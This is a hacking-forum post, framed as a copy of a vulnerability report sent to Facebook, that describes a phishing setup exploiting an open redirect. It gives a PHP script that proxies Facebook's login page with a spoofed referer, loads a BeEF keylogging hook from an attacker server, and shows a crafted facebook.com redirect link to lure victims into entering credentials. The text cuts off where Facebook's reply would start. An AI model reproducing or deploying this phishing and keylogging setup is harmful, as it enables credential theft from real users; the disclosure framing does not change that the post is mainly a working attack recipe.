Hello, a few days ago I warned Facebook about a redirect vulnerability; I sent them a mail to correct the vuln. I'm very happy because they replied to me quickly and they have corrected their vuln.

So now I can publish the technique legally, for your eyes' pleasure.

[hide=5]
Code:
From: pelo greyhat 
To: abuse@facebook.com
Subject: [New Facebook] New Facebook vulnerability


Hello, I want to inform you that I have discovered a Facebook redirect vulnerability. To help you understand how to exploit the redirection vulnerability, I have made a video.


How to easily make a fake page keylogging the keyboard of the victim.

We need:
- a 0day redirect vulnerability
- a server with cURL enabled
- BeEF (google it and install it onto your server)
- a little bit of social engineering (the victim has to click on your link and enter his credentials)

Host this PHP/JS script on your server:

curltrickbyp3lo.php

<?php
//50-1337 Crew presents: Universal redirect exploiter by p3Lo
//Greetz: 50-1337 CreW

//spoofing referer
$referer="http://www.facebook.com/";
// spoofing FireFox 2.0
$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://www.facebook.com/");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_REFERER, $referer);

curl_exec($ch);

curl_close($ch);
?>
<script src="http://beefsite/beef/hook/beefmagic.js.php"></script>

Now when the victim clicks on your redirect, like:

http://www.facebook.com/#//beefsite/curltrickbyp3lo.php

He will see the Facebook login page hosted on your website and keylogged with BeEF.

http://fr.youtube.com/watch?v=ArMD5XoJWnM&fmt=18


I have used my server only for testing purposes.
The vulnerability has just been seen by my white hat friends.
Of course, none of the accounts have been stolen for the tutorial. Nobody has used this technique illegally.


I'll be proud to know this vulnerability is fixed.

PS: sorry for my bad English, I am French.

Cordially

.p3Lo
-----End Original Message to Facebook-----
3 days later, the answer from Facebook's staff:
[code]
Subject